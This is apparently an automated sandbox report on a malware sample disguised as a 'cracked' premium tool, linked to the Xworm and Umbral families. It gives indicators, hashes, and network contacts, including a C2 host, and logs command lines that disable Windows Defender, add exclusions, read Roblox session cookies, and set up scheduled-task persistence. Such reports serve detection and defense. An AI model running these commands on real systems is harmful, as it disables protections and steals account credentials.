Analysis Overview
SHA256
471eeb9eeca3a3fb5bc949d95ddc7a29a8910a10b7567e725fc212c86c616b10
Threat Level: Known bad
The file AkrienPremiumCrack.zip was found to be: Known bad.
Malicious Activity Summary
Xworm
Umbral
Xworm family
Detect Umbral payload
Umbral family
Detect Xworm Payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Drops startup file
Reads user/profile data of web browsers
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Detects videocard installed
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-10 12:30
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 12:30
Reported
2024-07-10 12:32
Platform
win10-20240404-en
Max time kernel
78s
Max time network
81s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\AkrienPremiumCrack.zip
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 12:30
Reported
2024-07-10 12:33
Platform
win10-20240404-en
Max time kernel
81s
Max time network
81s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe
"C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.200.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45pl0jm5.qs5.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f5122bab5a78c0f2f7beff7b27b0aba7 |
| SHA1 | 87150a8ec43199a57db5584479e81434240477cd |
| SHA256 | d6b067c4eefed2e15a65c8ebb2053af2fd7392701430363ee6ceaa4121def3c9 |
| SHA512 | e98d6b9200406b07236915b69e8e6bd6d5f8cc2cad8db91382bca2f08f9cd445eaa49a5f8e0cddd4160562a8138386fee947a5e2bc4657f1be33ba259fe44b99 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98185f70e30865c647370a2d0bfc5882 |
| SHA1 | 47c5998dd519338f4567b543ca165405f0171afb |
| SHA256 | f19a1b762dbdac31d452c5acb50291dc85a0fd1e7609d2906d60d8e76320f0e7 |
| SHA512 | 523c0e85f81a2723aa7c0495963cf75902a2859d558d43a5f4dc22c383ad7fe43a83dd63dc5c130ba04bb28c04d5472743669e65459b941a029e2e90de6b1de4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 049309e5abbaed790ea8937ad3af8bb0 |
| SHA1 | 656e4a51d1a6ced6d02121b98a30f253a9feb3be |
| SHA256 | 78ffc1ea2fd3f668ac806db04a7f3523a3902ae45110cb7ed5f7f2517fdfb3d7 |
| SHA512 | 6498bc7895938120f17d57cc39b5f05d3201a560e8324587d55f39003fd9084e73964f2c057715bf0b9b56eb56e60cd6775785eda1be212a48c8722e172d5d04 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8bff5cddd5a596df1e3576529ed9824b |
| SHA1 | 181415e3f641ba7e7d92e334d23592850020d94b |
| SHA256 | 00425ddcb8f8571890f15341f327c76fddf0a0171fe8618cca79648eba1f5745 |
| SHA512 | 098628ec36984858e9312441e0c956f08a684af7dab7cdbeedefef2fd04048cc8f0424d0d282c4a2f402f099d982275bc5df2770bec1123e978da9fb771758a8 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\zo8WX.scr
| MD5 | 049427153333cbb91ce24e1c36b4d911 |
| SHA1 | 583d712848e1f88af5692c745d6c8c2e54e07824 |
| SHA256 | b05886d5d5e49aba42b56f7f2e9095a8a3229b9dd0404667fa4be80e6f750984 |
| SHA512 | d4ed952c5ddc341da364b8db4a534b6e867bd9bb3b7702bd762ee8118086bceb58bdf475c269f032d9a7042d4f12f122c6954b5d3c3ef161b283af1ecd2d6640 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\2290032291.pri
| MD5 | b8da5aac926bbaec818b15f56bb5d7f6 |
| SHA1 | 2b5bf97cd59e82c7ea96c31cf9998fbbf4884dc5 |
| SHA256 | 5be5216ae1d0aed64986299528f4d4fe629067d5f4097b8e4b9d1c6bcf4f3086 |
| SHA512 | c39a28d58fb03f4f491bf9122a86a5cbe7677ec2856cf588f6263fa1f84f9ffc1e21b9bcaa60d290356f9018fb84375db532c8b678cf95cc0a2cc6ed8da89436 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\715946058.pri
| MD5 | 30ec43ce86e297c1ee42df6209f5b18f |
| SHA1 | fe0a5ea6566502081cb23b2f0e91a3ab166aeed6 |
| SHA256 | 8ccddf0c77743a42067782bc7782321330406a752f58fb15fb1cd446e1ef0ee4 |
| SHA512 | 19e5a7197a92eeef0482142cfe0fb46f16ddfb5bf6d64e372e7258fa6d01cf9a1fac9f7258fd2fd73c0f8a064b8d79b51a1ec6d29bbb9b04cdbd926352388bae |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-10 12:30
Reported
2024-07-10 12:33
Platform
win10-20240404-en
Max time kernel
113s
Max time network
118s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Crack.lnk | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Crack.lnk | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Crack.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crack = "C:\\Users\\Admin\\AppData\\Roaming\\Crack.exe" | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Crack.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Crack.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Crack.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Crack.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Crack.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Crack" /tr "C:\Users\Admin\AppData\Roaming\Crack.exe"
C:\Users\Admin\AppData\Roaming\Crack.exe
C:\Users\Admin\AppData\Roaming\Crack.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Roaming\Crack.exe
C:\Users\Admin\AppData\Roaming\Crack.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | connection-elect.gl.at.ply.gg | udp |
| US | 147.185.221.16:37777 | connection-elect.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.16:37777 | connection-elect.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txwggdqf.e0q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80b8902782f5462a10a0c8211472d125 |
| SHA1 | 7c141cdcaa8a5e5e7e183795bdd74d26371947b6 |
| SHA256 | 5420bfb7358267b2d9975668e956d72fa055cc8e5c6372ffbbcb28bab7f1bc61 |
| SHA512 | 4521207b84309f638e694ea6d006b709dd3ba365ecd544baa8fa36e6467cf6556db9bfaab44c092aa2dd69a3aeee7e5d7e49a33dd200455eb00a0e6b8a3df1c1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fcb83416686231654942728172d8ba1e |
| SHA1 | ffd0ee09dec4d66e8c211cb9ccd99b854e1f9760 |
| SHA256 | 93a594303a6dc748349cc904fb5228741a71bf7562e53ef88fa106eb2577fbaa |
| SHA512 | 72238f2373d9816228d74f21762ad6afbb5fe91e3b38de3384001ab98f87de3d1a89f10f53d01f24b1595885f720a19cc07adeebb9a691be3723fbb9dd783997 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0098df8ed31e9e8c46f9cf3e915fd432 |
| SHA1 | 0ed488512c3df40685aaf20dafd0296077d50bf9 |
| SHA256 | 496d2fb51dbd01e1c57c60622486980d8bf385e4a744b3fd00ceffa9d5d49732 |
| SHA512 | 3a54df779a5e3379a8d2506c4ac984bc95fab89423e8b152c52e890439afaaa13b8ec436eaf76bd439b5e744c6137c12a36eb05aa810642b1764ec29fa0046d8 |
C:\Users\Admin\AppData\Roaming\Crack.exe
| MD5 | fafdca52fa2f2e543c82157ab5bd3abe |
| SHA1 | 66b2fa2d9b1e58a67723fe98c08352f1668ea561 |
| SHA256 | fdd41c041dd827148ad8a15c521255c017f1977522a90ef4e94fb898c2a04477 |
| SHA512 | 28869228921b62f13a1975a75f9956909024fd5e59ff1a61152a38feb0cfcb128d76c4a6477b8b8701073e8faa0343612b2cdb94f24fd0ff73f04f98a4a7e561 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Crack.lnk
| MD5 | bc93ad06d49df7b33daadcb348f26b15 |
| SHA1 | 22f0ad774a782a62720f2c955b2d55327471ca5b |
| SHA256 | ca450de834808efca47473eb0f0e2cd9da1352a5b3b3770d4f2a2fe2903104a4 |
| SHA512 | 07a2d08cbffb3daa65c5e274f04822b2f2aa753daded59c7494432dbef316a60339c9d72ff6f7eee6c2c400a009c4e1b9458626a501af406b72f329e3401cca4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Crack.exe.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |